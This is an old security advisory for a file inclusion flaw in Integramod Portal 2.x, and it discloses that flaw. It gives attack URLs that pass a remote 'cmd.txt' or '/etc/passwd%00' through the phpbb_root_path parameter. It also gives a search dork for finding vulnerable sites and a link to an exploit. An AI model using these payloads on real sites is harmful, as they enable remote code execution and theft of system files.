Integramod Portal versions 2.x and below suffer from a file inclusion vulnerability.
d356bffc06a1b2c323ca064cf4cc2376dec881b9a27c9bc18fa475241cc9edab
--Security Report--
Advisory: Integramod Portal <= 2.x File Inclusion Vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 24/08/06 03:00 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: https://www.nukedx.com
}
---
Vendor: Integramod (https://www.integramod.com)
Version: 2.x and prior versions must be affected.
About: Via this methods remote attacker can include arbitrary files to
Integramod.Variable phpbb_root_path did not sanitized properly before using
it on includes/functions_portal.php so remote attacker can include internal
and external files to VistaBB
For including internal files magic_quotes_gpc must be off on server settings
because remote attacker needs to use null char at the end of filename.
Eg: /etc/passwd%00
Level: Highly Critical
---
How&Example:
GET ->
https://[site]/[integramodpath]/includes/functions_portal.php?phpbb_root_path=[FILE]
EXAMPLE ->
https://[site]/[integramodpath]/includes/functions_portal.php?phpbb_root_path=https://yoursite.com/cmd.txt?
EXAMPLE ->
https://[site]/[integramodpath]/includes/functions_portal.php?phpbb_root_path=/etc/passwd%00
<- mq off
---
Timeline:
* 24/08/2006: Vulnerability found.
* 24/08/2006: Contacted with vendor and waiting reply.
---
Exploit: https://www.nukedx.com/?getxpl=47
---
Original advisory can be found at: https://www.nukedx.com/?viewdoc=47
---
Dorks: "Powered by Integramod"